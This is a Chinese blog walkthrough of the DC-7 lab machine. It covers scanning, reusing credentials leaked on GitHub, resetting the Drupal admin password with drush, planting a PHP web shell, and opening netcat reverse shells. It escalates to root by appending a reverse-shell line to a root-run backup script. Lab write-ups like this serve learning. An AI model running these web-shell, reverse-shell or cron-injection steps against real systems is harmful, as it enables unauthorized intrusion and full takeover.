Mamor's Blog
0%

DCchallenges7

发表于 分类于
本文字数: 4.5k 阅读时长 ≈ 4 分钟

信息收集

环境

网段 192.168.18.0/24

kali 192.168.18.131

靶机 192.168.18.140

扫描网段

kali@kali2020:~$ sudo nmap 192.168.18.0/24 -p- -sV Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-07 14:16 CST Nmap scan report for 192.168.18.2 Host is up (0.00045s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 53/tcp open domain dnsmasq 2.78 MAC Address: 00:50:56:E0:DA:9A (VMware)

Nmap scan report for 192.168.18.140 Host is up (0.00055s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 80/tcp open http Apache httpd 2.4.25 ((Debian)) MAC Address: 00:0C:29:7C:A6:2A (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.18.254 Host is up (0.00025s latency). All 65535 scanned ports on 192.168.18.254 are filtered MAC Address: 00:50:56:E1:37:77 (VMware)

Nmap scan report for 192.168.18.131 Host is up (0.0000030s latency). All 65535 scanned ports on 192.168.18.131 are closed

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 256 IP addresses (4 hosts up) scanned in 64.63 seconds

扫描靶机

kali@kali2020:~$ sudo nmap 192.168.18.140 -p- -sV Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-07 21:11 CST Nmap scan report for 192.168.18.140 Host is up (0.0017s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 80/tcp open http Apache httpd 2.4.25 ((Debian)) MAC Address: 00:0C:29:7C:A6:2A (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.94 seconds

dirsearch扫目录

http://192.168.18.140/user/login


进入主页看到时使用的Drupa,之前的dc-1也是使用的这个

根据提示找线索

Welcome to DC-7

DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are. :-)

While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.

What you will have to do, is to think "outside" the box.

Way "outside" the box. :-)

dc-7引入了一些“新”概念,但我还是让你们自己来弄清楚它们是什么。----) 虽然这个挑战并不完全是技术性的,但如果你需要诉诸粗暴的强迫或字典攻击,你可能不会成功。 你要做的是,想“外面”的盒子。 “外面”的盒子。----)

一直没搞懂这个外盒啥意思,看了下别人的博客,原来在主页下左下角有个@DC7USER,twitter上提示

了github地址,https://github.com/Dc7User,里面有一个staffdb,首先看下config.php

1
2
3
4
5
6
7
<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

ssh登录

可以得到一个数据库的账号密码,试了下无法登录网站

看看这个账号密码能不能登录ssh

dc7user MdR3xOgB7#dW,成功登录

dc7user@dc-7:~$ sudo -l -bash: sudo: command not found

** dc-7:~$ sudo **

-bash: sudo: command not found You have new mail in /var/mail/dc7user ** dc7user@dc-7:~$ cat /var/mail/dc7user ** .

内容和下面mbox差不多


** dc7user@dc-7:~$ ls backups mbox dc7user@dc-7:~$ cat mbox **

发现了3个备份文件

数据库文件

/home/dc7user/backups/website.sql

shell脚本文件

/opt/scripts/backups.sh

网站备份文件

/home/dc7user/backups/website.tar.gz


** dc7user@dc-7:~$ cat /opt/scripts/backups.sh **

#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/ gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz chown dc7user:dc7user /home/dc7user/backups/* rm /home/dc7user/backups/website.sql rm /home/dc7user/backups/website.tar.gz dc7user@dc-7:~ $ dc7user@dc-7:~$ ls -l /opt/scripts/backups.sh

-rwxrwxr-x 1 root www-data 520 Aug 29 2019 /opt/scripts/backups.sh

bash脚本中有用到drushgpg命令,查查用法

可以使用gpgdrush命令 ### 使用drush修改管理员密码 drush可以修改用户密码

Drush是Drupal的命令行shell和Unix脚本接口。Drush Core附带了许多有用的命令,可用于与模块/主题/配置文件等代码进行交互。

drush user-password admin --password="123"

dc7user@dc-7:~ $ drush user-password admin --password="123" Command user-password needs a higher bootstrap level to run - you will need to invoke drush from a more functional Drupal environment to run this command. [error] The drush command 'user-password admin' could not be executed. [error] dc7user@dc-7:~$

执行失败,进入/var/www/html目录试试

dc7user@dc-7:/var/www/html$ drush user-password admin --password="123" Changed password for admin [success] dc7user@dc-7:/var/www/html$

修改密码成功,试试能不能登录网站http://192.168.18.140/user/login

admin,123成功登录 ### 反弹shell 想办法反弹shell,看看能不能上传一句话木马连接

新建文件发现类型没有php

看看Extend插件扩展能不能安装php,没找到,需要手动安装,看了下别人的wp

下载php filter模块

https://www.drupal.org/project/php

提示安装格式应该为zip tar tgz gz bz2

下载tar.gz 保存到本地然后上传

安装成功

写个phpinfo()试试能不能成功

写一句话

连接蚁剑


nc反弹shell

kali nc -nlvp 8888

蚁剑 nc -c /bin/sh 192.168.18.131 8888

反弹交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

将反弹shell的脚本写入到/opt/scripts/backups.sh

echo "nc -e /bin/bash 192.168.18.131 7777" >> /opt/scripts/backups.sh

成功反弹到root的shell ,不过需要多等一会才行

注:其实可以在写一句话的时候可以直接写反弹shell <?php system('nc -e /bin/sh 192.168.18.131 9999'); ?>

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------